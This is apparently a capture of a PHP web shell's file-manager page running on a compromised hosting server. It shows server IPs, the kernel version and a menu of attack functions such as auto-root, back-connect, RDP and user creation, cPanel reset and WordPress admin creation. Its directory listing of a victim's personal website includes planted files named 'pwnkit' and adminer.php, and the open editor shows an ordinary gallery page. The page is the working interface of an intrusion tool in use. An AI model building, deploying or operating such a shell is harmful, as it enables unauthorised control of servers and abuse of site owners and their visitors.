Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.217.79
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
sohailbio.com /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
about-us.php
5.56
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
contact-us.php
6.9
KB
-rw-r--r--
index.php
11.75
KB
-rw-r--r--
news-detail.php
13.52
KB
-rw-r--r--
news-events.php
4.51
KB
-rw-r--r--
photo-gallery-detail.php
5.06
KB
-rw-r--r--
photo-gallery.php
3.87
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
video-gallery.php
3.83
KB
-rw-r--r--
youth-congress-logo.png
205.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : photo-gallery.php
<!DOCTYPE html> <html lang="zxx"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="apple-touch-icon" sizes="57x57" href="assets/images/favicon.png"> <link rel="manifest" href="assets/images/favicon.png"> <meta name="msapplication-TileColor" content="#ffffff"> <meta name="theme-color" content="#ffffff"> <title>MD Sohail Uddin</title> <?php include("includes/css.php");?> <style>.blog-txt-box h4::before { content: ""; background: var(--accent); width: 0px; height: 85.4%; position: absolute; left: 0; top: 50%; transform: translateY(-50%); } .blog-txt-box { padding: 15px 20px 12px; min-height: 56px; text-align: center;width: 100%; } .blog-single-box img{ height: 286px; border-radius: 10px; } </style> </head> <body> <?php include("includes/header.php");?> <div class="pbmit-title-bar-wrapper" style="background-image: url(assets/images/index2-counter-bg.jpg);"> <div class="container"> <div class="pbmit-title-bar-content"> <div class="pbmit-title-bar-content-inner"> <div class="pbmit-tbar"> <div class="pbmit-tbar-inner container"> <h1 class="pbmit-tbar-title">Gallery</h1> </div> </div> <div class="pbmit-breadcrumb"> <div class="pbmit-breadcrumb-inner"> <span><a title="" href="index.php" class="home"><span>Home</span></a></span> <span class="sep">/</span> <span><span class="post-root post post-post current-item">Photo Gallery</span></span> </div> </div> </div> </div> </div> </div> <section class="w-100 float-left padding-top padding-bottom" style="background-color: #f8f3ec;"> <div class="container"> <div class="blog-inner-con"> <div class="generic-title text-center"> <span class="small-txt d-block" data-aos="fade-up" data-aos-duration="700">Photo</span> <h2 data-aos="fade-up" data-aos-duration="700">Gallery</h2> </div> <div class="blog-boxes"> <div class="blog-single-box"> <div class="blog-img-con" data-aos="fade-up" data-aos-duration="700"> <figure class="mb-0"> <a href="photo-gallery-detail.php"> <img src="assets/images/gallery/1.jpg" alt="blog-img1" class="img-fluid" style="height:250px"></a> </figure> </div> <div class="blog-txt-box" data-aos="fade-up" data-aos-duration="700"> <h4><a href="photo-gallery-detail.php">Rally 2025</a></h4> </div> </div> <div class="blog-single-box"> <div class="blog-img-con" data-aos="fade-up" data-aos-duration="700"> <figure class="mb-0"> <a href="photo-gallery-detail.php"> <img src="assets/images/gallery/7.jpg" alt="blog-img1" class="img-fluid" style="height:250px"></a> </figure> </div> <div class="blog-txt-box" data-aos="fade-up" data-aos-duration="700"> <h4><a href="photo-gallery-detail.php">District Executive Meeting</a></h4> </div> </div> </div> </div> </div> </section> <?php include("includes/footer.php");?> <?php include("includes/js.php");?> </body> </html>
Close